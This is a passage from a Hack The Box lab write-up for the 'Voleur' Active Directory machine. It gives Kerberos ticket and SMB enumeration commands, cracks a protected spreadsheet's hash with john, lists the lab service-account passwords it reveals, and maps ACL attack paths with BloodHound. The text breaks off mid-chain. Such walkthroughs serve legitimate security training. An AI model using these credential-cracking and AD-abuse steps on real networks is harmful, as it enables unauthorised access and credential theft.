Active Directory

Hack The Box - HTB Voleur Writeup - Medium - Season 8 Weekly - July 5th 2025

Hack The Box - HTB Voleur Writeup - Medium - Season 8 Weekly - July 5th 2025

IP

10.xx.x.x

Domain/Hosts

dc.voleur.htb VOLEUR.HTB

/etc/krb5conf

default_realm = VOLEUR.HTB
dns_lookup_realm = false
dns_lookup_kdc = false
ticket_lifetime = 24h
renew_lifetime = 7d
forwardable = true
[realms]
VOLEUR.HTB = {
kdc = 10.xx.xx.xx
admin_server = 10.xx.xx.xx
default_domain = voleur.htb
}
[domain_realm]
.voleur.htb = VOLEUR.HTB
voleur.htb = VOLEUR.HTB

We'll start with default creds: ryan.naylor | HollowOct31Nyt rather than having to password spray it from seclists.

SMB Enumeartion

We'ss generate a Kerberos TGT for user Ryan Naylor using netexec with password authentication

netexec smb DC.VOLEUR.HTB -u ryan.naylor -p 'HollowOct31Nyt' -k --generate-tgt ryan.naylor

We'll set the Kerberos ticket cache environment variable to use Ryan Naylor’s TGT

export KRB5CCNAME=ryan.naylor.ccache

Verify the current Kerberos ticket

klist

We'll list available SMB shares on DC.VOLEUR.HTB using netexec with Kerberos authentication

 netexec smb DC.VOLEUR.HTB -u ryan.naylor -p 'HollowOct31Nyt' -k --shares

We get some interessting Shares

We'll connect to DC.VOLEUR.HTB using smbclient.py with Kerberos ticket authentication

KRB5CCNAME=ryan.naylor.ccache smbclient.py -k DC.VOLEUR.HTB
 use IT
 cd First-Line Support
 get Access_Review.xlsx

Creds in Access_Review.xls

The Access_Review.xlsx file is protected with a password We'll extract the password hash from Access_Review.xlsx using office2john and save it to hash.txt

 office2john Access_Review.xlsx >> hash.txt

Now crack the hash with rockyou.txt

 john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Password is: football1

Not we want to run msoffcrypto-tool and set up a python venv

 python3 -m venv venv
 source venv/bin/activate
 pip install msoffcrypto-tool
 cd /mnt/NASDF017E/#Kali/HTB/Voleur_HTB
 python3 -m msoffcrypto -p football1 Access_Review.xlsx entschluesselt_Access_Review.xlsx

open the sheet in https://jumpshare.com/viewer/xlsx or libreoffice

ServiceAccounts Passwords in Access_Review.xls

User | Password svc_ldap | M1XyC9pW7qT5Vn svc_iis | N5pXyV1WqM7CZ8

There's a hint that the deleted user Todd.Wolfe had the password NightT1meP1dg3on14

Attack Chain

run bloodhound-pythonwith Ryan Naylor's credentials to collect all Active Directory data from the VOLEUR.HTB domain, using Kerberos and outputting a zipped report

boodhound-python -u ryan.naylor -p 'HollowOct31Nyt' -c All -d VOLEUR.HTB -ns 10.xx.xx.xx--zip -k

svc_ldap have GenericWrite on lacey.miller and WriteSPN on svc_winrm

We'll generate a Kerberos TGT for svc_ldap on DC.VOLEUR.HTB using netexec with password authentication